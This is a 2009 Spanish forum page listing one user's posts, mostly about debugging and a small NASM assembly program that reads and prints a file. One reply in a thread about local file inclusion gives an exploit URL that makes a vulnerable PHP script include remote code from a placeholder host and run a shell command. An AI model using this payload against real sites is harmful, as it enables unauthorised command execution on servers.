Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - braulio--

#491
Software / Re: como hacerlo
13 Agosto 2009, 01:13 AM
Puedes mirar en el foro  de ingeniería inversa que hay en la sección de programación.
#492
He compilado con la opción -g para que genere información de depuración pero cuando uso el gdb me dice .
Symbols not Found
Asi que creo que no puedo poner ningún bp.
#493
Lo hice desde la consola pasándole un argumento de un fichero.
Ahora lo depuro .
¿Pero que se supone que debería buscar? El código lo tengo ahí mismo y en asm , para que el debugger?
#494
Estoy en linux, usando nasm y estoy haciendo este código.
Código (asm) [Seleccionar]
section .data:
 fichero: db 'programa'; Nombre que tendra el programa
section .bss:
 texto: resb 16000
section .text:
global _start
_start:
 mov eax,5 ; sys_open()
 pop ebx
 pop ebx ; El nombre de este programa
  pop ebx; Primer argumento
 mov ecx,0 ; Para leer
 int 80h
 ; Ya está en eax
 mov ebx,eax; Ya no(bueno , aun si)
 mov eax,3 ; sys_read
 mov ecx,texto
 mov edx,16000
 int 80h;
 ;El contenido del fichero este está en texto.
 ;Ahora voy a abrir otro fichero
 mov eax,4
 mov ebx,1
 mov ecx,texto
 mov edx,16000
 int 80h


 mov eax,1
 mov ebx,0
 int 80h

 
 

Cuando lo ejecuto (le he dado todos los permisos necesarios y eso) no hace nada.
Creo que lo he hecho bien, alguien sabe cuál es el problema?
Gracias
#495
Como lo has leído, por la función load_file()?
#496
Nivel Web / Re: Duda con LFI
5 Agosto 2009, 14:00 PM

Fijate que el archivo con el cual intentas hacer la inclusión es un jpg, el servidor, aunque la imagen tenga código php , lo va a interpretar como una imagen.

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
Ves la diferencia?
Aquí te dejo un tutorial de como bypassear los filtros.
#497
Te gustaría programarlo a ti? es que si no podrías hacerte un blogspot o usar un cms o algo asi...
#498
Pero todos colaboramos y ayudamos al foro no?
#499
BRAVO!!!! Lo que siempre había buscado  ;-) ;-) ;-) Gracias!!
#500
Jajacker y Darioxhc